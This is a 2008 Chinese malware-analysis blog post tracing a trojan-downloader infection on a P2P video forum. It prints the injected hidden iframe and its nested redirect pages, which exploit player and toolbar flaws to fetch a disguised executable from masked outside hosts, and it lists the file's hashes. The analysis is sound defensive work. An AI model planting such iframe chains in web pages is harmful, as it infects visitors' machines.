某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rq
endurer 原创
2008-02-04 第1版
在该坛页面中发现代码:
/---
<iframe src='hxxp://www.i***p*5*60.com/error.htm' width=100 height=1></iframe>
---/
1 hxxp://www.i***p*5*60.com/error.htm
包含代码:
/---
<iframe width='100' height='100' src='wm/g15.htm'></iframe>
<iframe width='100' height='100' src='wm/dm.htm'></iframe>
---/
1.1 hxxp://www.i***p*5*60.com/wm/g15.htm
利用 MS06-014: msadco.dll 严重漏洞 下载 hxxp://cIc**c.9**692*22.com/bak.css
bak.css其实是个PE格式的可执行文件
文件说明符 : D:/test/bak.css
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-4 12:43:16
修改时间 : 2008-2-4 12:41:18
访问时间 : 2008-2-4 12:43:59
大小 : 8848 字节 8.656 KB
MD5 : 7f5a731244199c7f29623cc1f106b6c4
SHA1: 3E16217D8B2814E152016BCEC5AADE3DF2621AF3
CRC32: 8ee9bc7c
Kaspersky 报为 Trojan-Downloader.Win32.Small.hsh,瑞星报为 Trojan.DL.Win32.Mnless.rq>>upx_c
该病毒会释放驱动程序,并替换windows系统文件explorer.exe、ctfmon.exe、internat.exe、conime.exe
1.2 hxxp://www.i***p*5*60.com/wm/dm.htm
输出代码:
/---
<script language=javascript src=11.js></script>
<iframe style=display:none src="re.htm"></iframe>
<iframe style=display:none src="storm.htm"></iframe>
<iframe style=display:none src="pdg2.htm"></iframe>
<iframe style=display:none src="wo.htm"></iframe>
<iframe width=100 height=0 src=Thunder.htm></iframe>
<iframe width=100 height=0 src=qvod.htm></iframe>
---/
1.2.1 hxxp://www.i***p*5*60.com/wm/11.js
输出代码:
/---
<iframe width='0' height='0' src='g14.htm'></iframe>
---/
1.2.1.1 hxxp://www.i***p*5*60.com/wm/g14.htm
内容同 hxxp://www.i***p*5*60.com/wm/g15.htm
1.2.2 hxxp://www.i***p*5*60.com/wm/re.htm
利用RealPlayer漏洞的代码。
1.2.3 hxxp://www.i***p*5*60.com/wm/storm.htm
利用 暴风影音 漏洞 下载 hxxp://down**.h*a**o3**65.org/bak.css
1.2.4 hxxp://www.i***p*5*60.com/wm/pdg2.htm
未能打开
1.2.5 hxxp://www.i***p*5*60.com/wm/wo.htm
利用 联众世界GLChat.ocx 漏洞 下载 hxxp://down**.h*a**o3**65.org/bak.css
hxxp://down**.h*a**o3**65.org/bak.css 与 hxxp://cIc**c.9**692*22.com/bak.css 相同。
1.2.6 hxxp://www.i***p*5*60.com/wm/Thunder.htm
未能打开
1.2.7 利用百度工具条(BaiduBar.Tool)下载 hxxp://cIc**c.9**692*22.com/Baidu1.cab
Baidu1.cab包含文件Baidu.exe,与 bak.css 相同。
1.2.8 hxxp://www.i***p*5*60.com/wm/qvod.htm
未能打开
分享到:
相关推荐
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
俄罗斯安全软件Dr.Web,Trojan. Plastix木马感染文件解除工具plstfix
针对Trojan-Dropper.Win32.Dropkit.a病毒,清除所需要的工具包,包括金山反间谍2007、PowerRmv、sreng2.5
2020年trojan最新windows64客户端
RakhniDecryptor,即卡巴斯基Rakhni勒索病毒解密工具,可以解密Rakhni在内的15种勒索病毒软件,其中还包括一款安卓勒索软件"Trojan-Ransom.AndroidOS.Pletor",如果你的电脑或安卓手机感染了勒索病毒,可以使用该...
安铁诺Trojan.VBS.StartPage.dy专杀 V2010.exe。针对1KB病毒
俄罗斯安全软件大蜘蛛Dr.Web,木马解锁工具.
敲诈者木马程序以敲诈勒索钱财为目的,使得感染该木马的计算机用户系统中的指定数据文件被恶意隐藏,造成用户数据丢失。截至目前为止,在国内已经出现了因感染该木马程序而导致计算机系统数据文件丢失的情况。该木马...
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
可以解密Rannoh在内的7款勒索软件加密的文件,包括Polyglot、Rannoh、AutoIt、Fury、Crybola、Cryakl以及CryptXXX,您的电脑感染了勒索病毒,重要文件被加密时,可以使用该工具尝试解密,如果恰好感染的是以上7种...
Gridinsoft Trojan Killer木马克星是专门来禁用/删除没有用户不必手动编辑系统文件或注册表的恶意软件。该方案还删除一些恶意软件进行了一些标准的防病毒扫描器忽略额外的系统修改。 Trojan Killer扫描所有的...
trojan
js.scob.trojan
增加5个变种的查杀,分别是Trojan.Win32.Undef.iqd,Trojan.Win32.Undef.pun,Trojan.Win32.Undef.kcq等 文件信息: Size: 148992 bytes File Version: 2.03 Modified: 2008年9月3日, 15:21:22 MD5: 0B85E5AFC3E...
它是:“木马列表下载器变种B(Trojan.DL.Win32.List.b)”病毒。该病毒会在用户的计算机上悄悄运行,并从黑客指定的网站下载“灰鸽子”、“网络游戏木马”、“密西”等多个病毒、木马及其变种。用户计算机一旦感染了...
我的电脑让学生插了一下U盘,结果电脑出现中毒现象(变慢、经常蓝屏、出错、自动重启),一查是染上了 假冒腾迅TXPLATFORM.EXE 的U盘病毒,属于 Trojan.Generic.Is.536802,此文介绍查杀方法
Trojan is a stable and efficient mobile lightweight log SDK that not only records general logs, such as Http, power changes, component life cycles, but also records the definition of the log, which it...
视频图像的编解码,将原始图像压缩成MPEG4格式,然后在客户端解压缩显示